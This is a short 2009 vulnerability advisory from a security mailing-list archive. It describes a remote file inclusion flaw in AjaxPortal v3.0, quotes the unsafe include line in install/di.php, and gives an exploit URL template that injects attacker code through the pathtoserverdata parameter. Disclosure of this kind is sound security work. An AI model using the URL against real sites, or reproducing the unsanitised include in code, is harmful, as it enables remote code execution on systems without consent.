Security Advisory: AjaxPortal v3.0 Remote File Inclusion Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  osTicket v1.6 RC4 Admin Login Blind SQLi
  Mega File Manager Remote File Vuln
  MULTIPLE SQL INJECTION VULNERABILITIES --PHP-AddressBook v-4.0.x-->
  Vulnerabilities in CMS SiteLogic

From: Cru3l.b0y <Cru3l.b0y_(at)_gmail.com>
Date: 29.06.2009
Subject: AjaxPortal v3.0 Remote File Inclusion Vulnerability

/================================================================================
===============================================================\
|
| [o] AjaxPortal v3.0 Remote File Inclusion Vulnerability
|
|       Software : AjaxPortal v3.0
|       Vendor   :
http://myiosoft.com/download/AjaxPortal/ajaxportal-30.zip
|       Author   : Cru3l.b0y
|       Contact : Cru3l.b0y@deltahacking.net
|               Home     : WwW.DeltaHacking.Net

|================================================================================
===============================================================|
|
| [o] Vulnerable file
|
|       install/di.php
|
|        include $pathtoserverdata."serverdata.php";
|

| [o] Exploit
|
|
http://localhost/[path]/install/di.php?pathtoserverdata=[evilcode]

test server